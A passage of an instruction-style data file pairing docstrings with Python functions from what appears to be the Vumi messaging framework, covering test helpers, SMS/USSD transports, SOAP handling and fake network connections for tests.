'_internalReaders', set()) + selectables = set(reactor.getReaders() + reactor.getWriters()) + if not (selectables - internal_readers): + return + yield deferLater( + reactor, self.reactor_check_interval, lambda: None) +[INST] Register a cleanup function to be called at teardown time.. [/INST] def add_cleanup(self, func, *args, **kw): + if self._cleanup_funcs is None: + self._cleanup_funcs = [] + self._cleanup_funcs.append((func, args, kw)) +[INST] Perform setup and register cleanup for the given helper object.. [/INST] def add_helper(self, helper_object, *args, **kw): + if not IHelper.providedBy(helper_object): + raise ValueError( + "Helper object does not provide the IHelper interface: %s" % ( + helper_object,)) + self.add_cleanup(helper_object.cleanup) + return maybe_async_return( + helper_object, helper_object.setup(*args, **kw)) +[INST] The only real difference between using this method and constructing a +message object directly is that this method provides sensible defaults +for most fields and sets the routing endpoint (if provided) in a more +convenient way. + +The following parameters are mandatory.. [/INST] def make_user_message(self, content, from_addr, to_addr, group=None, + session_event=None, transport_type=DEFAULT, + transport_name=DEFAULT, transport_metadata=DEFAULT, + helper_metadata=DEFAULT, endpoint=DEFAULT, **kw): + if transport_type is DEFAULT: + transport_type = self.transport_type + if helper_metadata is DEFAULT: + helper_metadata = {} + if transport_metadata is DEFAULT: + transport_metadata = {} + if transport_name is DEFAULT: + transport_name = self.transport_name + msg = TransportUserMessage( + from_addr=from_addr, + to_addr=to_addr, + group=group, + transport_name=transport_name, + transport_type=transport_type, + transport_metadata=transport_metadata, + helper_metadata=helper_metadata, + content=content, + session_event=session_event, + **kw) + if endpoint is not DEFAULT: + msg.set_routing_endpoint(endpoint) + return msg +[INST] Wait for any pending message deliveries and stop all workers.. [/INST] def cleanup(self): + yield self.broker.wait_delivery() + for worker in self._workers: + yield worker.stopWorker() +[INST] Clean up a particular worker manually and remove it from the helper's +cleanup list. This should only be called with workers that are already +in the helper's cleanup list.. [/INST] def cleanup_worker(self, worker): + self._workers.remove(worker) + return worker.stopWorker() +[INST] Clear all dispatched messages from the broker.. [/INST] def clear_all_dispatched(self): + self.broker.clear_messages('vumi') + self.broker.clear_messages('vumi.metrics') +[INST] Wait for events dispatched to a connector.. [/INST] def wait_for_dispatched_events(self, amount=None, connector_name=None): + d = self._wait_for_dispatched(connector_name, 'event', amount) + d.addCallback(lambda msgs: [ + TransportEvent(**msg.payload) for msg in msgs]) + return d +[INST] Wait for inbound messages dispatched to a connector.. [/INST] def wait_for_dispatched_inbound(self, amount=None, connector_name=None): + d = self._wait_for_dispatched(connector_name, 'inbound', amount) + d.addCallback(lambda msgs: [ + TransportUserMessage(**msg.payload) for msg in msgs]) + return d +[INST] Wait for outbound messages dispatched to a connector.. [/INST] def wait_for_dispatched_outbound(self, amount=None, connector_name=None): + d = self._wait_for_dispatched(connector_name, 'outbound', amount) + d.addCallback(lambda msgs: [ + TransportUserMessage(**msg.payload) for msg in msgs]) + return d +[INST] Wait for statuses dispatched to a connector.. [/INST] def wait_for_dispatched_statuses(self, amount=None, connector_name=None): + if connector_name is None: + connector_name = self._status_connector_name + d = self._wait_for_dispatched(connector_name, 'status', amount) + d.addCallback(lambda msgs: [ + TransportStatus(**msg.payload) for msg in msgs]) + return d +[INST] Clear dispatched events for a connector.. [/INST] def clear_dispatched_events(self, connector_name=None): + return self._clear_dispatched(connector_name, 'event') +[INST] Clear dispatched inbound messages for a connector.. [/INST] def clear_dispatched_inbound(self, connector_name=None): + return self._clear_dispatched(connector_name, 'inbound') +[INST] Clear dispatched outbound messages for a connector.. [/INST] def clear_dispatched_outbound(self, connector_name=None): + return self._clear_dispatched(connector_name, 'outbound') +[INST] Clear dispatched statuses for a connector.. [/INST] def clear_dispatched_statuses(self, connector_name=None): + if connector_name is None: + connector_name = self._status_connector_name + return self._clear_dispatched(connector_name, 'status') +[INST] Dispatch a message to the specified routing key.. [/INST] def dispatch_raw(self, routing_key, message, exchange='vumi'): + self.broker.publish_message(exchange, routing_key, message) + return self.kick_delivery() +[INST] Trigger delivery of messages by the broker. +This is generally called internally by anything that sends a message.. [/INST] def kick_delivery(self): + return self.broker.kick_delivery() +[INST] Get dispatched metrics after waiting for any pending deliveries. +The list of datapoints from each dispatched metrics message is +returned.. [/INST] def wait_for_dispatched_metrics(self): + return self.broker.wait_delivery().addCallback( + lambda _: self.get_dispatched_metrics()) +[INST] Clear dispatched metrics messages from the broker.. [/INST] def clear_dispatched_metrics(self): + self.broker.clear_messages('vumi.metrics') +[INST] Construct and dispatch a delivery report event. +This is a wrapper around :meth:`MessageHelper.make_delivery_report` (to +which all parameters are passed) and. [/INST] def make_dispatch_delivery_report(self, *args, **kw): + msg = self.msg_helper.make_delivery_report(*args, **kw) + d = self.worker_helper.dispatch_event(msg) + return d.addCallback(lambda r: msg) +[INST] Construct and dispatch a status. +This is a wrapper around :meth:`MessageHelper.make_status` (to +which all parameters are passed) and. [/INST] def make_dispatch_status(self, *args, **kw): + msg = self.msg_helper.make_status(*args, **kw) + d = self.worker_helper.dispatch_status(msg) + return d.addCallback(lambda r: msg) +[INST] This is useful for skipping tests that require optional dependencies which +might not be present.. [/INST] def import_skip(exc, *expected): + module = import_filter(exc, *expected) + raise SkipTest("Failed to import '%s'." % (module,)) +[INST] Decorate a test that should be skipped with a reason. +NOTE: Don't import this as `skip`, because that will cause trial to skip +the entire module that imports it.. [/INST] def skiptest(reason): + def skipdeco(func): + func.skip = reason + return func + return skipdeco +[INST] Return ``value`` or a deferred that fires with it. +This is useful in cases where we're performing a potentially async +operation but don't necessarily have enough information to use +`maybe_async`.. [/INST] def maybe_async_return(value, maybe_deferred): + if isinstance(maybe_deferred, Deferred): + return maybe_deferred.addCallback(lambda r: value) + return value +[INST] Get a list of Riak managers and whether they should be purged. +The return value is a list of (`bool`, `Manager`) tuples. If the first +item is `True`, the manager should be purged. It's safe to purge +managers even if the first item is `False`, but it adds extra cleanup +time.. [/INST] def _get_riak_managers_for_cleanup(self): + seen_bucket_prefixes = set() + managers = [] + for manager in self._riak_managers: + if manager.bucket_prefix in seen_bucket_prefixes: + managers.append((False, manager)) + else: + seen_bucket_prefixes.add(manager.bucket_prefix) + managers.append((True, manager)) + return reversed(managers) +[INST] Get a list of Redis managers and whether they should be purged. +The return value is a list of (`bool`, `Manager`) tuples. If the first +item is `True`, the manager should be purged. It's safe to purge +managers even if the first item is `False`, but it adds extra cleanup +time.. [/INST] def _get_redis_managers_for_cleanup(self): + seen_key_prefixes = set() + managers = [] + for manager in self._redis_managers: + if manager._key_prefix in seen_key_prefixes: + managers.append((False, manager)) + else: + seen_key_prefixes.add(manager._key_prefix) + managers.append((True, manager)) + return reversed(managers) +[INST] This is a separate method to allow easy overriding.. [/INST] def _purge_redis(self, manager): + try: + yield manager._purge_all() + except RuntimeError, e: + if e.args[0] != 'Not connected': + raise +[INST] Patch a Riak manager to capture load and store operations.. [/INST] def record_load_and_store(self, riak_manager, loads, stores): + orig_load = riak_manager.load + orig_store = riak_manager.store + def record_load(modelcls, key, result=None): + loads.append(key) + return orig_load(modelcls, key, result=result) + def record_store(obj): + stores.append(obj.key) + return orig_store(obj) + self._patch(riak_manager, "load", record_load) + self._patch(riak_manager, "store", record_store) +[INST] All configs for things that create Riak or Redis clients should be +passed through this method.. [/INST] def mk_config(self, config): + self._check_patches_applied() + config = config.copy() + config.update(self._config_overrides) + return config +[INST] Transport-specific config validation happens in here.. [/INST] def validate_config(self): + self.web_path = self.config['web_path'] + self.web_port = int(self.config['web_port']) + self.integrat_url = self.config['url'] + self.integrat_username = self.config['username'] + self.integrat_password = self.config['password'] + self.transport_type = self.config.get('transport_type', 'ussd') +[INST] Call .send_to() for a message from RapidSMS that is not a reply. +This is for overriding by sub-classes that need to add additional +message options.. [/INST] def send_rapidsms_nonreply(self, to_addr, content, config, endpoint): + return self.send_to(to_addr, content, endpoint=endpoint) +[INST] Do any necessary computation when a field changes.. [/INST] def model_field_changed(self, modelobj, changed_field_name): + pass +[INST] Perform a paginated index query for backlinked objects.. [/INST] def reverse_lookup_keys_paginated(self, modelobj, manager=None, + max_results=None, continuation=None): + if manager is None: + manager = modelobj.manager + return manager.index_keys_page( + self.model_cls, self.index_name, modelobj.key, + max_results=max_results, continuation=continuation) +[INST] Publishes a status if it is not a repeat of the previously +published status.. [/INST] def add_status(self, **kw): + if self.status_detect.check_status(**kw): + yield self.publish_status(**kw) +[INST] Read outbound message and do what needs to be done with them.. [/INST] def handle_outbound_message(self, message): + request_id = message['in_reply_to'] + request = self.get_request(request_id) + builder = self.infer_message_type(message) + wc_msg = builder(message) + if request is None or request.finished: + return self.push_message(wc_msg, message) + request.write(wc_msg.to_xml()) + request.finish() + d = self.publish_ack(user_message_id=message['message_id'], + sent_message_id=message['message_id']) + wc_metadata = message["transport_metadata"].get('wechat', {}) + if wc_metadata: + d.addCallback(lambda _: self.set_cached_reply( + wc_metadata['MsgId'], wc_msg.to_xml())) + if message['session_event'] == TransportUserMessage.SESSION_CLOSE: + d.addCallback( + lambda _: self.clear_addr_mask(wc_msg.to_user_name)) + return d +[INST] Construct a real webserver to test actual connectivity.. [/INST] def make_real_webserver(self): + root = Resource() + root.isLeaf = True + root.render = lambda r: self._render_request(r) + site_factory = Site(root) + webserver = yield reactor.listenTCP( + 0, site_factory, interface='127.0.0.1') + self.add_cleanup(webserver.loseConnection) + addr = webserver.getHost() + url = "http://%s:%s/" % (addr.host, addr.port) + returnValue(url) +[INST] Wrapper around http_request_full and friends that injects our fake +connection's agent.. [/INST] def with_agent(self, f, *args, **kw): + kw.setdefault('agent_class', self.fake_http.get_agent) + return f(*args, **kw) +[INST] Called when an inbound transport user message is consumed. +The other methods listed below all function in the same way. Only the +kind and direction of the message being processed differs.. [/INST] def handle_consume_inbound(self, message, connector_name): + return self.handle_inbound(message, connector_name) +[INST] Called when an inbound transport user message is published.. [/INST] def handle_publish_inbound(self, message, connector_name): + return self.handle_inbound(message, connector_name) +[INST] Default handler for published and consumed inbound messages.. [/INST] def handle_inbound(self, message, connector_name): + return message +[INST] Called when an outbound transport user message is consumed.. [/INST] def handle_consume_outbound(self, message, connector_name): + return self.handle_outbound(message, connector_name) +[INST] Called when an outbound transport user message is published.. [/INST] def handle_publish_outbound(self, message, connector_name): + return self.handle_outbound(message, connector_name) +[INST] Default handler for published and consumed outbound messages.. [/INST] def handle_outbound(self, message, connector_name): + return message +[INST] Called when a transport event is consumed.. [/INST] def handle_consume_event(self, event, connector_name): + return self.handle_event(event, connector_name) +[INST] Called when a transport event is published.. [/INST] def handle_publish_event(self, event, connector_name): + return self.handle_event(event, connector_name) +[INST] Default handler for published and consumed events.. [/INST] def handle_event(self, event, connector_name): + return event +[INST] Called when a failure message is consumed.. [/INST] def handle_consume_failure(self, failure, connector_name): + return self.handle_failure(failure, connector_name) +[INST] Called when a failure message is published.. [/INST] def handle_publish_failure(self, failure, connector_name): + return self.handle_failure(failure, connector_name) +[INST] Called to process a failure message (. [/INST] def handle_failure(self, failure, connector_name): + return failure +[INST] Return a list of middleware objects created from a worker +configuration.. [/INST] def create_middlewares_from_config(worker, config): + middlewares = [] + for item in config.get("middleware", []): + keys = item.keys() + if len(keys) != 1: + raise ConfigError( + "Middleware items contain only a single key-value pair. The" + " key should be a name for the middleware. The value should be" + " the full dotted name of the class implementing the" + " middleware, or a mapping containing the keys 'class' with a" + " value of the full dotted class name, 'consume_priority' with" + " the priority level for consuming, and 'publish_priority'" + " with the priority level for publishing, both integers.") + middleware_name = keys[0] + middleware_config = config.get(middleware_name, {}) + if isinstance(item[middleware_name], basestring): + cls_name = item[middleware_name] + middleware_config['consume_priority'] = 0 + middleware_config['publish_priority'] = 0 + elif isinstance(item[middleware_name], dict): + conf = item[middleware_name] + cls_name = conf.get('class') + try: + middleware_config['consume_priority'] = int(conf.get( + 'consume_priority', 0)) + middleware_config['publish_priority'] = int(conf.get( + 'publish_priority', 0)) + except ValueError: + raise ConfigError( + "Middleware priority level must be an integer") + else: + raise ConfigError( + "Middleware item values must either be a string with the", + " full dotted name of the class implementing the middleware," + " or a dictionary with 'class', 'consume_priority', and" + " 'publish_priority' keys.") + cls = load_class_by_string(cls_name) + middleware = cls(middleware_name, middleware_config, worker) + middlewares.append(middleware) + return middlewares +[INST] Add a pool to list of pools.. [/INST] def _register_pool(self, pool): + pool = self._encode(pool) + pool_list_key = self._pool_list_key() + yield self.redis.sadd(pool_list_key, pool) +[INST] Remove a pool to list of pools.. [/INST] def _unregister_pool(self, pool): + pool = self._encode(pool) + pool_list_key = self._pool_list_key() + yield self.redis.srem(pool_list_key, pool) +[INST] Generic response for abnormal server side errors.. [/INST] def response_for_error(self): + response = { + 'message': 'We encountered an error while processing your message', + 'type': 'end' + } + return response +[INST] Called on requests that timed out.. [/INST] def finish_expired_request(self, request_id, request): + del self._requests[request_id] + log.msg('Timing out on response for %s' % request.session['from_addr']) + request.deferred.callback(self.response_for_error()) +[INST] Transport-specific config validation happens in here.. [/INST] def validate_config(self): + self.message_id_lifetime = self.config.get('message_id_lifetime', + self.DEFAULT_MESSAGE_ID_LIFETIME) + self.web_receipt_path = self.config['web_receipt_path'] + self.web_receive_path = self.config['web_receive_path'] + self.web_port = int(self.config['web_port']) + self.opera_url = self.config['url'] + self.opera_channel = self.config['channel'] + self.opera_password = self.config['password'] + self.opera_service = self.config['service'] + self.max_segments = self.config.get('max_segments', 9) + self.r_config = self.config.get('redis_manager', {}) + self.transport_name = self.config['transport_name'] +[INST] Decide what to do on certain failure cases.. [/INST] def handle_outbound_message_failure(self, failure, message): + if failure.check(xmlrpc.Fault): + raise TemporaryFailure(failure) + elif failure.check(ValueError): + yield self.publish_nack(message['message_id'], str(failure.value)) + raise PermanentFailure(failure) + else: + yield self.publish_nack(message['message_id'], str(failure.value)) + raise failure +[INST] Clean-up of setup done in setup_dispatcher should happen here.. [/INST] def teardown_dispatcher(self): + pass +[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function(obj): + obj.a = obj.a + u"-modified" + return True +[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function_deferred(obj): + from twisted.internet import reactor + return deferLater(reactor, 0.1, post_migrate_function, obj) +[INST] Post-migrate-function for use in tests.. [/INST] def post_migrate_function_new_only(obj): + if obj.was_migrated: + return post_migrate_function(obj) + return False +[INST] Get the fully-qualified name of a thing.. [/INST] def fqpn(thing): + return ".".join([thing.__module__, thing.__name__]) +[INST] This is a drop in replacement for the original `http_request_full` method +but it has its internals completely replaced by treq. Treq supports SNI +and our implementation does not for some reason. Also, we do not want +to continue maintaining this because we're favouring treq everywhere +anyway.. [/INST] def http_request_full(url, data=None, headers={}, method='POST', + timeout=None, data_limit=None, context_factory=None, + agent_class=None, reactor=None): + agent_class = agent_class or Agent + if reactor is None: + from twisted.internet import reactor + kwargs = {'pool': HTTPConnectionPool(reactor, persistent=False)} + if context_factory is not None: + kwargs['contextFactory'] = context_factory + agent = agent_class(reactor, **kwargs) + client = HTTPClient(agent) + def handle_response(response): + return SimplishReceiver(response, data_limit).deferred + d = client.request(method, url, headers=headers, data=data) + d.addCallback(handle_response) + if timeout is not None: + cancelling_on_timeout = [False] + def raise_timeout(reason): + if not cancelling_on_timeout[0] or reason.check(HttpTimeoutError): + return reason + return Failure(HttpTimeoutError("Timeout while connecting")) + def cancel_on_timeout(): + cancelling_on_timeout[0] = True + d.cancel() + def cancel_timeout(r, delayed_call): + if delayed_call.active(): + delayed_call.cancel() + return r + d.addErrback(raise_timeout) + delayed_call = reactor.callLater(timeout, cancel_on_timeout) + d.addCallback(cancel_timeout, delayed_call) + return d +[INST] Checks to see if the current status is a repeat. If it is, None is +returned. If it isn't, the status is returned.. [/INST] def check_status(self, **status): + self._check_state(status['status'], status['component']) + if self._check_type(status['type'], status['component']): + return status +[INST] Count keys in an index page, filtering by regex if necessary.. [/INST] def count_keys(self, keys, filter_regex): + if filter_regex is not None: + keys = [(v, k) for v, k in keys if filter_regex.match(v)] + return len(keys) +[INST] Perform an index query to get all keys and count them.. [/INST] def count_all_keys(self): + self.emit("Counting all keys ...") + index_page = yield self.model.all_keys_page( + max_results=self.options["index-page-size"]) + yield self.count_pages(index_page, filter_regex=None) +[INST] Perform an index query to get all matching keys and count them.. [/INST] def count_index_keys(self): + filter_regex = self.options["index-value-regex"] + if filter_regex is not None: + filter_regex = re.compile(filter_regex) + self.emit("Counting ...") + index_page = yield self.model.index_keys_page( + field_name=self.options["index-field"], + value=self.options["index-value"], + end_value=self.options["index-value-end"], + max_results=self.options["index-page-size"], + return_terms=True) + yield self.count_pages(index_page, filter_regex=filter_regex) +[INST] handle messages arriving over AMQP meant for delivery via vas2nets. [/INST] def handle_outbound_message(self, message): + params = { + 'username': self.config['username'], + 'password': self.config['password'], + 'owner': self.config['owner'], + 'service': self.config['service'], + } + v2n_message_id = message.get('in_reply_to') + if v2n_message_id is not None: + if v2n_message_id.startswith(self.transport_name): + v2n_message_id = v2n_message_id[len(self.transport_name) + 1:] + else: + v2n_message_id = message['message_id'] + message_params = { + 'call-number': normalize_outbound_msisdn(message['to_addr']), + 'origin': message['from_addr'], + 'messageid': v2n_message_id, + 'provider': message['transport_metadata']['network_id'], + 'tariff': message['transport_metadata'].get('tariff', 0), + 'text': validate_characters(message['content']), + 'subservice': self.config.get('subservice', + message['transport_metadata'].get( + 'keyword', '')), + } + params.update(message_params) + log.msg('Hitting %s with %s' % (self.config['url'], params)) + log.msg(urlencode(params)) + try: + response = yield http_request_full( + self.config['url'], urlencode(params), { + 'User-Agent': ['Vumi Vas2Net Transport'], + 'Content-Type': ['application/x-www-form-urlencoded'], + }, 'POST', agent_class=self.agent_factory) + except ConnectionRefusedError: + log.msg("Connection failed sending message:", message) + raise TemporaryFailure('connection refused') + log.msg('Headers', list(response.headers.getAllRawHeaders())) + header = self.config.get('header', 'X-Nth-Smsid') + if response.code != 200: + raise PermanentFailure('server error: HTTP %s: %s' + % (response.code, response.delivered_body)) + if response.headers.hasHeader(header): + transport_message_id = response.headers.getRawHeaders(header)[0] + yield self.publish_ack( + user_message_id=message['message_id'], + sent_message_id=transport_message_id, + ) + else: + err_msg = 'No SmsId Header, content: %s' % response.delivered_body + yield self.publish_nack( + user_message_id=message['message_id'], + sent_message_id=message['message_id'], + reason=err_msg) + raise Vas2NetsTransportError(err_msg) +[INST] Store this failure in redis, with an optional retry delay.. [/INST] def store_failure(self, message, reason, retry_delay=None): + message_json = message + if not isinstance(message, basestring): + message_json = to_json(message) + key = self.failure_key() + if not retry_delay: + retry_delay = 0 + yield self.redis.hmset(key, { + "message": message_json, + "reason": reason, + "retry_delay": str(retry_delay), + }) + yield self.add_to_failure_set(key) + if retry_delay: + yield self.store_retry(key, retry_delay) + returnValue(key) +[INST] Handle a failed message from a transport.. [/INST] def handle_failure(self, message, failure_code, reason): + if failure_code == FailureMessage.FC_TEMPORARY: + return self.do_retry(message, reason) + else: + return self.store_failure(message, reason) +[INST] Asserts that the JSON response we're getting back is the same as +the list of messages provided. + +There are easier ways to do this by comparing bigger JSON blogs +but then debugging the huge strings would be a pain.. [/INST] def assertJSONResultEqual(self, json_blob, messages): + dictionaries = json.loads(json_blob) + self.assertEqual(len(dictionaries), len(messages), + 'Unequal amount of dictionaries and messages') + for dictionary, message in zip(dictionaries, messages): + self.assertEqual( + TransportUserMessage(_process_fields=False, **message.payload), + TransportUserMessage.from_json(json.dumps(dictionary))) +[INST] Wait zero seconds to give the reactor a chance to work. +Returns its (optional) argument, so it's useful as a callback.. [/INST] def wait0(r=None): + from twisted.internet import reactor + return deferLater(reactor, 0, lambda: r) +[INST] Write some bytes and allow the reactor to send them.. [/INST] def write(self, data): + self.transport.write(data) + return wait0() +[INST] Get an endpoint that connects clients to this server.. [/INST] def endpoint(self): + return FakeServerEndpoint(self) +[INST] Wait for a client to start connecting, and then return a. [/INST] def await_connection(self): + return self.connection_queue.get() +[INST] Wait for a client to finish connecting.. [/INST] def await_connected(self): + return self._connected_d +[INST] Wait for the both sides of the connection to close.. [/INST] def await_finished(self): + return self._finished_d +[INST] Patch the protocol's makeConnection and connectionLost methods to make the +protocol and its transport behave more like what `Agent` expects. + +While `Agent` is the driving force behind this, other clients and servers +will no doubt have similar requirements.. [/INST] def patch_protocol_for_agent(protocol): + old_makeConnection = protocol.makeConnection + old_connectionLost = protocol.connectionLost + def new_makeConnection(transport): + patch_transport_fake_push_producer(transport) + patch_transport_abortConnection(transport, protocol) + return old_makeConnection(transport) + def new_connectionLost(reason): + if protocol._fake_connection_aborted and reason.check(ConnectionDone): + reason = Failure(ConnectionAborted()) + return old_connectionLost(reason) + protocol.makeConnection = new_makeConnection + protocol.connectionLost = new_connectionLost + protocol._fake_connection_aborted = False +[INST] Patch a method onto an object if it isn't already there.. [/INST] def patch_if_missing(obj, name, method): + setattr(obj, name, getattr(obj, name, method)) +[INST] Patch the three methods belonging to IPushProducer onto the transport if it +doesn't already have them. (`Agent` assumes its transport has these.). [/INST] def patch_transport_fake_push_producer(transport): + patch_if_missing(transport, 'pauseProducing', lambda: None) + patch_if_missing(transport, 'resumeProducing', lambda: None) + patch_if_missing(transport, 'stopProducing', transport.loseConnection) +[INST] Patch abortConnection() on the transport or add it if it doesn't already +exist (`Agent` assumes its transport has this). + +The patched method sets an internal flag recording the abort and then calls +the original method (if it existed) or transport.loseConnection (if it +didn't).. [/INST] def patch_transport_abortConnection(transport, protocol): + _old_abortConnection = getattr( + transport, 'abortConnection', transport.loseConnection) + def abortConnection(): + protocol._fake_connection_aborted = True + _old_abortConnection() + transport.abortConnection = abortConnection +[INST] Called if the SMPP connection is not bound within +``smpp_bind_timeout`` amount of seconds. [/INST] def drop_link(self): + if self.is_bound(): + return + yield self.service.on_smpp_bind_timeout() + yield self.disconnect( + 'Dropping link due to binding delay. Current state: %s' % ( + self.state)) +[INST] Send a PDU to the SMSC. [/INST] def send_pdu(self, pdu): + self.emit('OUTGOING >> %r' % (pdu.get_obj(),)) + return self.transport.write(pdu.get_bin()) +[INST] Called when an SMPP PDU is received for which no handler function has +been defined.. [/INST] def on_unsupported_command_id(self, pdu): + self.log.warning( + 'Received unsupported SMPP command_id: %r' % (command_id(pdu),)) +[INST] Called when the bind has been setup. [/INST] def on_smpp_bind(self, sequence_number): + self.drop_link_call.cancel() + self.disconnect_call = self.clock.callLater( + self.idle_timeout, self.disconnect, + 'Disconnecting, no response from SMSC for longer ' + 'than %s seconds' % (self.idle_timeout,)) + self.enquire_link_call.clock = self.clock + self.enquire_link_call.start(self.config.smpp_enquire_link_interval) + return self.service.on_smpp_bind() +[INST] Format a datetime object using the Vumi date format.. [/INST] def format_vumi_date(timestamp): + return timestamp.strftime(VUMI_DATE_FORMAT) +[INST] Parse a timestamp string using the Vumi date format. +Timestamps without microseconds are also parsed correctly.. [/INST] def parse_vumi_date(value): + date_format = VUMI_DATE_FORMAT + if "." not in value[-10:]: + date_format = _VUMI_DATE_FORMAT_NO_MICROSECONDS + return datetime.strptime(value, date_format) +[INST] A special payload attribute that isn't stored by the message store.. [/INST] def cache(self): + return self.payload.setdefault(self._CACHE_ATTRIBUTE, {}) +[INST] Construct a reply message. +The reply message will have its `to_addr` field set to the original +message's `from_addr`. This means that even if the original message is +directed to the group only , the +reply will be directed to the sender of the original message.. [/INST] def reply(self, content, continue_session=True, **kw): + session_event = None if continue_session else self.SESSION_CLOSE + for field in [ + 'to_addr', 'from_addr', 'group', 'in_reply_to', 'provider' + 'transport_name', 'transport_type', 'transport_metadata']: + if field in kw: + raise TypeError("'%s' may not be overridden." % (field,)) + fields = { + 'helper_metadata': self['helper_metadata'], + 'session_event': session_event, + 'to_addr': self['from_addr'], + 'from_addr': self['to_addr'], + 'group': self['group'], + 'in_reply_to': self['message_id'], + 'provider': self['provider'], + 'transport_name': self['transport_name'], + 'transport_type': self['transport_type'], + 'transport_metadata': self['transport_metadata'], + } + fields.update(kw) + out_msg = TransportUserMessage(content=content, **fields) + out_msg.set_routing_endpoint(self.get_routing_endpoint()) + return out_msg +[INST] Messages sent to the bot will arrive here. Command handling routing +is done in this function.. [/INST] def onMessage(self, message): + if not isinstance(message.body, DomishElement): + return None + text = unicode(message.body).encode('utf-8').strip() + from_addr, _, _ = message['from'].partition('/') + self.message_callback( + to_addr=self.jid.userhost(), + from_addr=from_addr, + content=text, + transport_type='xmpp', + transport_metadata={ + 'xmpp_id': message.getAttribute('id'), + }) +[INST] Perform a SOAP request. +If the remote server responds with an HTTP 500 status, then it is assumed +that the body contains a SOAP fault, which is then parsed and a `SoapFault` +exception raised.. [/INST] def perform_soap_request(uri, action, body, header=None, + expected_faults=None, + http_request_full=http_request_full): + def _parse_soap_response(response): + root = fromstring(response.delivered_body) + body, header = unwrap_soap_envelope(root) + if response.code == http.INTERNAL_SERVER_ERROR: + raise SoapFault.from_element(body, expected_faults) + return body, header + envelope = soap_envelope(body, header) + headers = { + 'SOAPAction': action, + 'Content-Type': 'text/xml; charset="utf-8"'} + d = http_request_full(uri, tostring(envelope), headers) + d.addCallback(_parse_soap_response) + return d +[INST] Wrap an element or text in a SOAP envelope.. [/INST] def soap_envelope(body, header=None): + parts = [SOAP_ENV.Body(body)] + if header is not None: + parts.insert(0, SOAP_ENV.Header(header)) + return SOAP_ENV.Envelope(*parts) +[INST] Unwrap a SOAP request and return the SOAP header and body elements.. [/INST] def unwrap_soap_envelope(root): + header = elemfind(root, SOAP_ENV.Header) + body = elemfind(root, SOAP_ENV.Body) + if body is None: + raise SoapFault(u'soapenv:Client', u'Malformed SOAP request') + return body, header +[INST] Create a SOAP fault response.. [/INST] def soap_fault(faultcode, faultstring=None, faultactor=None, detail=None): + def _maybe(f, value): + if value is not None: + return f(value) + return None + xs = [ + LocalNamespace.faultcode(faultcode), + _maybe(LocalNamespace.faultstring, faultstring), + _maybe(LocalNamespace.faultactor, faultactor), + _maybe(LocalNamespace.detail, detail)] + return SOAP_ENV.Fault(*[x for x in xs if x is not None]) +[INST] Parse expected SOAP faults from a SOAP fault ``detail`` element.. [/INST] def _parse_expected_faults(detail, expected_faults): + if detail is None: + return None + for child in detail.getchildren(): + for exc_type in expected_faults: + try: + if exc_type.detail_type is not None: + det = exc_type.detail_type.from_element(child) + if det is not None: + return exc_type, det + except: + log.err( + None, 'Error parsing SOAP fault element (%r) with %r' % ( + child, exc_type.detail_type)) + return None +[INST] Parse a SOAP fault element and its details.. [/INST] def parse_soap_fault(body, expected_faults=None): + fault = elemfind(body, SOAP_ENV.Fault) + if fault is None: + return None + faultcode = gettext(fault, u'faultcode') + faultstring = gettext(fault, u'faultstring') + faultactor = gettext(fault, u'faultactor') + detail = elemfind(fault, u'detail') + if expected_faults is None: + expected_faults = [] + parsed = _parse_expected_faults(detail, expected_faults) + return parsed, (faultcode, faultstring, faultactor, detail) +[INST] Parse a SOAP fault from an ElementTree element.. [/INST] def from_element(cls, root, expected_faults=None): + faultinfo = parse_soap_fault(root, expected_faults) + if faultinfo is None: + raise ValueError( + 'Element (%r) does not contain a SOAP fault' % (root,)) + parsed_fault, faultinfo = faultinfo + if parsed_fault is None: + parsed_fault = SoapFault, None + exc_type, parsed_detail = parsed_fault + faultcode, faultstring, faultactor, detail = faultinfo + return exc_type( + faultcode, faultstring, faultactor, detail, parsed_detail) +[INST] Serialize this SOAP fault to an ElementTree element.. [/INST] def to_element(self): + detail = self.detail + if detail is not None: + detail = self.detail.getchildren() + return soap_fault( + self.code, self.string, self.actor, detail) +[INST] Clean-up of setup done in setup_transport.. [/INST] def teardown_transport(self): + self.session_manager.stop() + if self.xmlrpc_server is not None: + yield self.xmlrpc_server.stopListening() +[INST] Called by the XML-RPC server when it receives a payload that +needs processing.. [/INST] def handle_raw_inbound_request(self, message_id, values, d): + self.timeout_request = self.callLater(self.timeout, + self.timed_out, message_id) + self._requests[message_id] = values + self._requests_deferreds[message_id] = d + if not self.validate_inbound_data(values.keys()): + self.timeout_request.cancel() + self.remove_request(message_id) + d.errback(InvalidRequest("4001: Missing Parameters")) + else: + session_id = values['TransactionId'] + session = yield self.session_manager.load_session(session_id) + if session: + session_event = TransportUserMessage.SESSION_RESUME + content = values['USSDRequestString'] + else: + yield self.session_manager.create_session( + session_id, from_addr=values['MSISDN'], + to_addr=values['USSDServiceCode']) + session_event = TransportUserMessage.SESSION_NEW + content = None + metadata = { + 'transaction_id': values['TransactionId'], + 'transaction_time': values['TransactionTime'], + } + res = yield self.publish_message( + message_id=message_id, + content=content, + from_addr=values['MSISDN'], + to_addr=values['USSDServiceCode'], + session_event=session_event, + transport_type=self.transport_type, + transport_metadata={'mtn_rwanda_ussd': metadata} + ) + returnValue(res) +[INST] Read outbound message and do what needs to be done with them.. [/INST] def handle_outbound_message(self, message): + request_id = message['in_reply_to'] + if self.get_request(request_id) is None: + return self.publish_nack(user_message_id=message['message_id'], + sent_message_id=message['message_id'], + reason='Request not found') + self.timeout_request.cancel() + self.finish_request(request_id, + message.payload['content'].encode('utf-8'), + message['session_event']) + return self.publish_ack(user_message_id=request_id, + sent_message_id=request_id) +[INST] Create a client connection to a fake server.. [/INST] def connect_client(self, fake_server): + conn_d = fake_server.await_connection() + self.assertNoResult(conn_d) + client_d = fake_server.endpoint.connect(self.client_factory) + client = self.successResultOf(client_d) + conn = self.successResultOf(conn_d) + self.assert_connected(conn, client) + return (conn, client) +[INST] Assert that a connection is not yet connected.. [/INST] def assert_pending(self, conn): + self.assertEqual(conn.client_protocol, None) + self.assertEqual(conn.server_protocol, None) + self.assertEqual(conn.connected, False) + self.assertEqual(conn.pending, True) + self.assertNoResult(conn._accept_d) + self.assertNoResult(conn._connected_d) + self.assertNoResult(conn._finished_d) +[INST] Assert that a connection is connected to a client.. [/INST] def assert_connected(self, conn, client): + self.assertIsInstance(conn.client_protocol, DummyClientProtocol) + self.assertEqual(conn.client_protocol.side, "client") + self.assertEqual(conn.client_protocol.connected, True) + 